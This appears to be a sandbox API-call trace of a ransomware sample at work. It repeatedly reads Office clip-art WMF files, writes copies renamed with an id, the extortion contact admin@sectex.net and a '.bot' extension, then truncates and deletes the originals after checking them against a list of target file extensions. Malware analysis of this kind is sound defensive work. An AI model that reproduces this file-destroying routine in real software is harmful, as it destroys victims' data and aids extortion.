	[0145.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.823] GetLastError () returned 0x0
	[0145.823] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x7620, lpOverlapped=0x0) returned 1
	[0145.830] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x7630, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x7630, lpOverlapped=0x0) returned 1
	[0145.832] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.832] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.832] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.832] CloseHandle (hObject=0x3c0) returned 1
	[0145.832] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.832] SetEndOfFile (hFile=0x31c) returned 1
	[0145.835] CloseHandle (hObject=0x31c) returned 1
	[0145.835] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.835] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf")) returned 1
	[0145.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.836] lstrlenW (lpString=".doc") returned 4
	[0145.836] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.836] lstrlenW (lpString=".docx") returned 5
	[0145.836] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.836] lstrlenW (lpString=".pdf") returned 4
	[0145.836] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.836] lstrlenW (lpString=".xls") returned 4
	[0145.836] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.836] lstrlenW (lpString=".xlsx") returned 5
	[0145.836] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.836] lstrlenW (lpString=".ppt") returned 4
	[0145.836] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.836] lstrlenW (lpString=".zip") returned 4
	[0145.836] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.836] lstrlenW (lpString=".rar") returned 4
	[0145.836] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.836] lstrlenW (lpString=".bz2") returned 4
	[0145.836] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.836] lstrlenW (lpString=".7z") returned 3
	[0145.836] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.836] lstrlenW (lpString=".dbf") returned 4
	[0145.836] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.837] lstrlenW (lpString=".1cd") returned 4
	[0145.837] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.837] lstrlenW (lpString=".jpg") returned 4
	[0145.837] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.837] lstrlenW (lpString=".doc") returned 4
	[0145.837] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.837] lstrlenW (lpString=".docx") returned 5
	[0145.837] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.837] lstrlenW (lpString=".pdf") returned 4
	[0145.837] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.837] lstrlenW (lpString=".xls") returned 4
	[0145.837] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.837] lstrlenW (lpString=".xlsx") returned 5
	[0145.837] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.837] lstrlenW (lpString=".ppt") returned 4
	[0145.837] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.837] lstrlenW (lpString=".zip") returned 4
	[0145.837] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.837] lstrlenW (lpString=".rar") returned 4
	[0145.837] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.837] lstrlenW (lpString=".bz2") returned 4
	[0145.837] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.837] lstrlenW (lpString=".7z") returned 3
	[0145.837] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.837] lstrlenW (lpString=".dbf") returned 4
	[0145.837] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.837] lstrlenW (lpString=".1cd") returned 4
	[0145.838] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63
	[0145.838] lstrlenW (lpString=".jpg") returned 4
	[0145.838] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.838] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.838] lstrlenW (lpString="FD00090_.WMF") returned 12
	[0145.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.838] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=14194) returned 1
	[0145.838] CloseHandle (hObject=0x31c) returned 1
	[0145.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf")) returned 0x20
	[0145.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.839] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.839] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.839] GetLastError () returned 0x0
	[0145.839] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x3772, lpOverlapped=0x0) returned 1
	[0145.841] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x3780, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x3780, lpOverlapped=0x0) returned 1
	[0145.842] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.842] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.842] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.842] CloseHandle (hObject=0x3c0) returned 1
	[0145.842] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.842] SetEndOfFile (hFile=0x31c) returned 1
	[0145.844] CloseHandle (hObject=0x31c) returned 1
	[0145.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.847] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf")) returned 1
	[0145.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.848] lstrlenW (lpString=".doc") returned 4
	[0145.848] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.848] lstrlenW (lpString=".docx") returned 5
	[0145.848] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.848] lstrlenW (lpString=".pdf") returned 4
	[0145.848] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.848] lstrlenW (lpString=".xls") returned 4
	[0145.848] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.848] lstrlenW (lpString=".xlsx") returned 5
	[0145.848] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.848] lstrlenW (lpString=".ppt") returned 4
	[0145.848] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.848] lstrlenW (lpString=".zip") returned 4
	[0145.848] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.848] lstrlenW (lpString=".rar") returned 4
	[0145.848] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.848] lstrlenW (lpString=".bz2") returned 4
	[0145.848] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.848] lstrlenW (lpString=".7z") returned 3
	[0145.848] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.848] lstrlenW (lpString=".dbf") returned 4
	[0145.848] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.848] lstrlenW (lpString=".1cd") returned 4
	[0145.848] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.848] lstrlenW (lpString=".jpg") returned 4
	[0145.848] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.849] lstrlenW (lpString=".doc") returned 4
	[0145.849] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.849] lstrlenW (lpString=".docx") returned 5
	[0145.849] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.849] lstrlenW (lpString=".pdf") returned 4
	[0145.849] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.849] lstrlenW (lpString=".xls") returned 4
	[0145.849] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.849] lstrlenW (lpString=".xlsx") returned 5
	[0145.849] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.849] lstrlenW (lpString=".ppt") returned 4
	[0145.849] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.849] lstrlenW (lpString=".zip") returned 4
	[0145.849] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.849] lstrlenW (lpString=".rar") returned 4
	[0145.849] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.849] lstrlenW (lpString=".bz2") returned 4
	[0145.849] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.849] lstrlenW (lpString=".7z") returned 3
	[0145.849] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.849] lstrlenW (lpString=".dbf") returned 4
	[0145.849] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.849] lstrlenW (lpString=".1cd") returned 4
	[0145.849] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63
	[0145.849] lstrlenW (lpString=".jpg") returned 4
	[0145.849] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.850] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.850] lstrlenW (lpString="FD00096_.WMF") returned 12
	[0145.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.850] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=37390) returned 1
	[0145.850] CloseHandle (hObject=0x31c) returned 1
	[0145.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf")) returned 0x20
	[0145.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.851] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.851] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.851] GetLastError () returned 0x0
	[0145.851] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x920e, lpOverlapped=0x0) returned 1
	[0146.083] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x9210, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x9210, lpOverlapped=0x0) returned 1
	[0146.085] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.085] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.085] SetEndOfFile (hFile=0x3c0) returned 1
	[0146.087] CloseHandle (hObject=0x3c0) returned 1
	[0146.087] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.087] SetEndOfFile (hFile=0x31c) returned 1
	[0146.486] CloseHandle (hObject=0x31c) returned 1
	[0146.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.507] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf")) returned 1
	[0146.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.519] lstrlenW (lpString=".doc") returned 4
	[0146.519] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.519] lstrlenW (lpString=".docx") returned 5
	[0146.519] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.519] lstrlenW (lpString=".pdf") returned 4
	[0146.519] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.519] lstrlenW (lpString=".xls") returned 4
	[0146.519] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.519] lstrlenW (lpString=".xlsx") returned 5
	[0146.519] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.519] lstrlenW (lpString=".ppt") returned 4
	[0146.519] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.519] lstrlenW (lpString=".zip") returned 4
	[0146.519] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.520] lstrlenW (lpString=".rar") returned 4
	[0146.520] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.520] lstrlenW (lpString=".bz2") returned 4
	[0146.520] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.520] lstrlenW (lpString=".7z") returned 3
	[0146.520] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.520] lstrlenW (lpString=".dbf") returned 4
	[0146.520] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.520] lstrlenW (lpString=".1cd") returned 4
	[0146.520] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.520] lstrlenW (lpString=".jpg") returned 4
	[0146.520] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.520] lstrlenW (lpString=".doc") returned 4
	[0146.520] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.520] lstrlenW (lpString=".docx") returned 5
	[0146.520] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.520] lstrlenW (lpString=".pdf") returned 4
	[0146.520] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.520] lstrlenW (lpString=".xls") returned 4
	[0146.520] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.520] lstrlenW (lpString=".xlsx") returned 5
	[0146.520] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.520] lstrlenW (lpString=".ppt") returned 4
	[0146.520] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.520] lstrlenW (lpString=".zip") returned 4
	[0146.521] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.521] lstrlenW (lpString=".rar") returned 4
	[0146.521] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.521] lstrlenW (lpString=".bz2") returned 4
	[0146.521] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.521] lstrlenW (lpString=".7z") returned 3
	[0146.521] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.521] lstrlenW (lpString=".dbf") returned 4
	[0146.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.521] lstrlenW (lpString=".1cd") returned 4
	[0146.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63
	[0146.521] lstrlenW (lpString=".jpg") returned 4
	[0146.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.521] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.521] lstrlenW (lpString="FD00438_.WMF") returned 12
	[0146.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.524] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5098) returned 1
	[0146.524] CloseHandle (hObject=0x3a0) returned 1
	[0146.524] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf")) returned 0x20
	[0146.524] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.524] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.524] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
